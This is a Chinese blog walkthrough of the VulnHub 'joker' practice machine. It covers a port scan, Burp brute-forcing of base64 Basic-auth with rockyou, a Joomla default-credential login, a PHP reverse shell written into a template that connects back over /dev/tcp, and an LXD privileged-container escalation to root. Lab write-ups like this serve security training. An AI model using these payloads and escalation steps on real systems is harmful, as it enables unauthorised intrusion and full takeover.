渗透测试-vulnhub靶机 joker

信息收集

ip端口扫描

 访问80端口

敏感目录扫描,发现秘密文件

访问secret.txt

发现多次提到rock,暗示用kali里面的rockyou字典的前100个进行密码爆破,字典路径/usr/share/wordlists,解压

访问8080端口http服务,发现需要账号密码

bp 密码爆破

输入用户名joker,密码随便输一个,123,发现账号密码加密

复制到base在线解密发现是自己输入的账号密码

 bp密码爆破,发送到测试器标记一下

设置用户名设置密码字典,由于rock密码有1400万我们复制前100

选择给账号密码base64加密

开始攻击,爆破出密码

base64解密

登陆8080端口

getshell

登录后,发现8080端口web服务为 Joomla CMS。Joomla 默认后台地址: /administrator。默认用户密码 joomla/joomla

 

 使用默认账号密码joomla/joomla进行登陆,登陆成功

点击模板

选择

进入到模板

kali 开启 nc 监听

书写反弹shell

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/ip/ports 0>&1'");
?>

点击Template Preview

反弹shell成功

 kali配置代理

github下载镜像

使用LXD提升权限,执行以下操作

git clone https://github.com/saghul/lxd-alpine-builder.git
 
cd lxd-alpine-builder
 
ls
 
./build-alpine
 
ls

kali 开启python2 -m SimpleHTTPServer

靶机下载

wget http://192.168.91.134:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
 
lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
 
lxc image list

lxd 提权

靶机执行以下命令获取flag

lxc init myimage ignite -c security.privileged=true
 
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
 
lxc start ignite
 
lxc exec ignite /bin/sh
 
id
 
cd /mnt/root/root
 
ls
 
cat final.txt

获取root权限

打开flags,通关

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值